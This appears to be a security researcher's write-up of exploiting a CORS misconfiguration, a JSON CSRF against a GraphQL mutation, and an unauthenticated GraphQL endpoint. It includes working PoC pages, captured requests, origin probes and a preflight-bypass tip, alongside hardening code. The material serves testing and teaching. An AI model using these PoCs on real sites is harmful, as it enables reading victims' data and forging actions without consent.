Advanced JSON POST Exploitation — CORS, CSRF, Broken Access Control

GET-based CORS

  • The application failed to validate the Origin header properly and returned Access-Control-Allow-Credentials: true, while the user session was validated by cookies. That combination lets a page on an attacker-controlled origin read authenticated responses with the victim's cookies attached.
  • So the application was vulnerable to a CORS mis-configuration, but nobody had managed to exploit it: the endpoint required an extra parameter in the Accept header (domain=example.com.webconfiguration; version=1) for GET requests, so simply opening https://example.com/webpath/.webconfig in the browser showed a blank page. Looking at the proxy revealed the request below, with the required Accept value.
GET /webpath/.webconfig HTTP/1.1
Host: example.com
Connection: close
Accept: application/json; domain=example.com.webconfiguration; version=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Origin: example.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,es;q=0.8
Cookie: xyz=1231
A preflight OPTIONS request captured in the proxy (Origin: null is what a browser sends from a page opened as a local file or from a sandboxed iframe):

OPTIONS /endpoint HTTP/1.1
Host: example.com
Connection: close
Accept: */*
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Accept
Origin: null
The PoC page below sets the required Accept header and sends the request with credentials; opened by a logged-in victim, it reads the authenticated response and shows it in an alert.

<!DOCTYPE html>
<html>
<head>
<script>
// Reads the authenticated response cross-origin: the victim's cookies are
// attached because withCredentials is set, and the server reflects the
// attacker origin with Access-Control-Allow-Credentials: true.
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      alert(this.responseText);
      document.getElementById("demo").innerText = this.responseText;
    }
  };
  xhttp.open("GET", "https://example.com/webpath/.webconfig", true);
  // The Accept value the endpoint requires for GET requests.
  xhttp.setRequestHeader("Accept", "application/json; domain=example.com.webconfiguration; version=1");
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</head>
<body>
<center>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
</center>
</body>
</html>
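The mis-configuration described in this section, as an added example that is not code from the original post: a handler that reflects the Origin header next to an exact-match allowlist handler, and the check a tester applies to the response headers. Everything is a pure function modelling response headers, so it runs offline without a server; the allowlist contents and the probe origins are assumptions.

```javascript
// Added example (not from the original post). Models the Origin-reflecting
// CORS handler from the write-up beside a hardened allowlist handler, plus
// the response-header check a tester uses to confirm exploitability.

// Vulnerable: echoes whatever Origin arrived and allows credentials, so any
// page can read the victim's cookie-authenticated response.
function vulnerableCorsHeaders(origin) {
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Assumed allowlist of full origins (scheme + host + optional port).
const ALLOWED_ORIGINS = new Set(["https://example.com", "https://app.example.com"]);

// Hardened: exact-match against the allowlist. No regex, prefix or suffix
// matching, and "null" is never allowed because sandboxed iframes and
// file:// pages send it. Unlisted origins get no CORS headers at all.
function hardenedCorsHeaders(origin, allowlist = ALLOWED_ORIGINS) {
  if (typeof origin !== "string" || origin === "null" || !allowlist.has(origin)) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin", // stop caches serving one origin's ACAO to another
  };
}

// Tester's check: a page at `origin` can read the credentialed response iff
// ACAO equals that exact origin and ACAC is "true". ACAO "*" together with
// credentials is refused by browsers, so it is not exploitable this way.
function credentialedReadAllowed(origin, headers) {
  const acao = headers["Access-Control-Allow-Origin"];
  const acac = String(headers["Access-Control-Allow-Credentials"] || "").toLowerCase();
  return acao === origin && acac === "true";
}

// Origins worth sending when probing a target (assumed list), each aimed at
// a common validation mistake.
function probeOrigins(target) {
  const host = new URL(target).host;
  return [
    "https://attacker.example",          // no validation at all
    `https://${host}.attacker.example`,  // startsWith(host) check
    `https://attacker${host}`,           // endsWith(host) check
    "null",                              // sandboxed iframe / file://
  ];
}

// Returns the probe origins for which `handler` allows a credentialed read.
function auditHandler(handler, target = "https://example.com") {
  return probeOrigins(target).filter((origin) => credentialedReadAllowed(origin, handler(origin)));
}
```

Running auditHandler(vulnerableCorsHeaders) flags all four probe origins, while auditHandler(hardenedCorsHeaders) flags none. Against a live target the same probe values go into the Origin header of the captured request and the two Access-Control-* response headers are read back; only the exact-reflection-plus-credentials case is what the PoC above relies on.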

POST-based CORS / CSRF

The same mis-configuration makes state-changing requests exploitable. The GraphQL mutation below creates a team member and is authenticated by the session cookie alone. Because the body is sent as application/json, the browser preflights the request, so this CSRF only works because the server also answers the preflight with a permissive Access-Control-Allow-Origin and Access-Control-Allow-Credentials: true. The request as captured in the proxy:

POST /webpath/v1/graphql HTTP/1.1
Host: example.com
Content-Length: 395
Content-Type: application/json
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Origin: example.com
Cookie: xyz=1231

{"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}}
The PoC page below sends the same mutation from an attacker-controlled origin with the victim's cookies attached:

<!DOCTYPE html>
<html>
<head>
<script>
// Fires the createTeamMember mutation with the victim's session cookie.
// The browser sends a preflight first because of the JSON Content-Type;
// the request goes through only if the server approves the attacker origin.
function csrf() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      alert("CSRF_EXPLOITED");
    }
  };

  // The GraphQL mutation captured above, as a JSON object
  const json = {"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}};
  xhttp.open("POST", "https://example.com/webpath/v1/graphql", true);
  xhttp.setRequestHeader("Content-Type", "application/json");
  xhttp.withCredentials = true;
  xhttp.send(JSON.stringify(json));
}
</script>
</head>
<body>
<center>
<div id="demo">
<button type="button" onclick="csrf()">Exploit</button>
</div>
</center>
</body>
</html>
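Why the JSON mutation above needs the server's cooperation to be fired cross-site, as an added example that is not code from the original post: a model of the Fetch standard's "CORS-safelisted request" rules, which decide whether a browser sends a preflight OPTIONS like the one captured earlier. The Range header rules are left out (a simplification); everything else follows the standard's safelist.

```javascript
// Added example (not from the original post). Decides whether a request
// is "simple" (sent directly) or needs a preflight, following the Fetch
// standard's CORS-safelisted request-header rules. Simplified: the Range
// header is not handled.

const SAFE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFE_HEADER_NAMES = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFE_CONTENT_TYPES = new Set(["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]);
// Bytes the standard forbids in a safelisted header value (plus controls other than TAB).
const UNSAFE_VALUE_CHARS = new Set(['"', "(", ")", ":", "<", ">", "?", "@", "[", "\\", "]", "{", "}", "\x7f"]);

function hasUnsafeValueBytes(value) {
  for (const ch of value) {
    const code = ch.charCodeAt(0);
    if ((code < 0x20 && code !== 0x09) || UNSAFE_VALUE_CHARS.has(ch)) return true;
  }
  return false;
}

// A request header is CORS-safelisted when its name is on the short list,
// its value is at most 128 bytes with no forbidden bytes, and for
// Content-Type the MIME essence is one of the three form-style types.
function isSafelistedHeader(name, value) {
  const n = name.toLowerCase();
  if (!SAFE_HEADER_NAMES.has(n)) return false;
  if (value.length > 128 || hasUnsafeValueBytes(value)) return false;
  if (n === "content-type") {
    const essence = value.split(";")[0].trim().toLowerCase();
    return SAFE_CONTENT_TYPES.has(essence);
  }
  return true;
}

// Header names that force a preflight, lowercased and sorted the way the
// browser lists them in Access-Control-Request-Headers.
function unsafeHeaderNames(headers) {
  return Object.entries(headers)
    .filter(([name, value]) => !isSafelistedHeader(name, value))
    .map(([name]) => name.toLowerCase())
    .sort();
}

function needsPreflight(method, headers) {
  return !SAFE_METHODS.has(method.toUpperCase()) || unsafeHeaderNames(headers).length > 0;
}

// The OPTIONS request the browser sends before a non-simple request, or
// null when the request is simple and goes out directly.
function buildPreflight(origin, method, headers) {
  if (!needsPreflight(method, headers)) return null;
  const preflight = { Origin: origin, "Access-Control-Request-Method": method.toUpperCase() };
  const names = unsafeHeaderNames(headers);
  if (names.length) preflight["Access-Control-Request-Headers"] = names.join(",");
  return preflight;
}
```

needsPreflight("POST", { "Content-Type": "application/json" }) is true, which is why the CSRF PoC depends on the CORS mis-configuration: a server that rejects the preflight never sees the mutation. The flip side is the practitioner's caveat: needsPreflight("POST", { "Content-Type": "text/plain" }) is false, so a JSON endpoint that does not enforce Content-Type can be hit with a plain HTML form or XHR using text/plain with no preflight and no CORS mis-configuration at all.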

Broken Access Control in JSON POST

  • When testing for broken access control, replay every request with the Authorization header and the cookies removed. This application used GraphQL; checking each request manually in Repeater, the mutation below still executed with both the cookies and the Authorization header stripped, so the endpoint was running mutations without any authentication. The unauthenticated request as replayed:
POST /webpath/v1/graphql HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/graphql
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 259
Origin: https://example.com
Connection: close

{"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}}

Akash Pawar
https://www.facebook.com/0xVeera/